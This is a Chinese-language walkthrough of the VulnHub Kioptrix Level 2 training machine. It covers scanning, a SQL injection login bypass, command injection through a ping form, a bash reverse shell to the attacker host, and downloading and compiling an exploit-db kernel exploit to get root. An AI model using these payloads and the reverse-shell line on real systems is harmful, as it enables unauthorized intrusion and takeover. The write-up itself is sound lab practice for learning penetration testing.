VulnHub - Kioptrix Level 2 破解

环境说明：

靶机：172.21.137.75 (CentOS)
攻击机：172.21.137.36 (Kali)

渗透过程：

1. 首先信息收集，看看靶机到底在哪个IP上，用arp-scan -l 命令扫一下，发现IP是172.21.137.75(发现方法为靶机开关前后，各扫一次IP段，多出来的那个就是)
   

2. 用Nmap 扫下全端口，获取开启服务以及相关版本的信息，命令:nmap -sV --open -p- -T4 172.21.137.75
   

3. 发现开启了很多服务，有ssh, ipp,mysql 等等， 但是Mysql端口不给直接访问，ssh要爆破的话，这个靶机渗透就没意义了，其他服务，像 rpcbind,ssl,ipp,status，查了下网上相关漏洞资料和EXP，都是DDOS用的，不能自己DDOS自己吧

4. 只能慢慢来，先去看可访问的80端口，发现一处登录窗口
   

5. 用插件看下了是PHP的，先在用户名输入admin'，提交后发现没有SQL报错

6. EMMM，爷不信邪，没注入这个靶机还怎么搞，扫目录也只有Tomcat的文档，没点用啊，再加个注释符号试一下admin' #，提交后发现进去了！？你敢信，见图
   

7. Ping IP用的！眼前一亮啊，这！！这不很大可能就有命令执行嘛！！！赶紧试试，看能不能执行命令，输入 172.21.137.75 ; id，并提交，发现还真有，id都出来了！
   

8. 那就好说了呀，Kali直接用ncnc -lvp 4444开端口，让靶机执行命令172.21.137.75;bash -i >& /dev/tcp/172.21.137.36/4444 0>&1反连试一下，能够成功连接！（这里继续连着，之后还要操作）
   

9. 那就好说了呀，拿到SHELL了，但是看过id发现不是root用户，那么就要提权！

10. .首先在Shell里uname -r看下内核版本， 发现是 2.6.9-55.EL的
    

11. Kali这里开新的终端窗口，用Github上的linux-exploit-suggester工具看下改版本有什么可用提权用的EXP
    

12. EMMM，这可以用的EXP也太多了吧，总不能一个个试吧

13. 没什么好办法，根据Details里面的连接一个个看吧，发现唯一靠谱的是9542编号这个，里面的注释中正好符合靶机的系统版本
    

14. 那废话不多说，直接Kali这边把文件下载下来，命令wget https://www.exploit-db.com/download/9542
    

15. 该文件需要编译后才能执行，这一步可用放到靶机上再做

16. Kali用python3 python -m http.server 9999开启端口，供靶机下载文件（注意，直接在文件所在位置开启端口即可，方便）

17. 刚才保留的Shell那里，cd到/目录下，也就是root目录下，新建一个tmp文件夹（主要是因为临时文件夹有可执行权限，其他目录下没有），使用命令wget http://172.21.137.36:9999/9542.c把文件下载过来
    

18. 下载好还要编译，命令：gcc -o 9542 9542.c（9542文件才是编译好用的文件）
    

19. 编译好执行 ./9542，出现提示就表示成功了，见图
    

20. 最后查看下 id，发现是root，提权成功！
    

21. 之后用 passwd改好密码，用更新的root账号登录就完全成功了！开心结束！：）
    

参考链接：

• https://www.vulnhub.com/entry/kioptrix-level-11-2,23/
• https://www.exploit-db.com/exploits/9542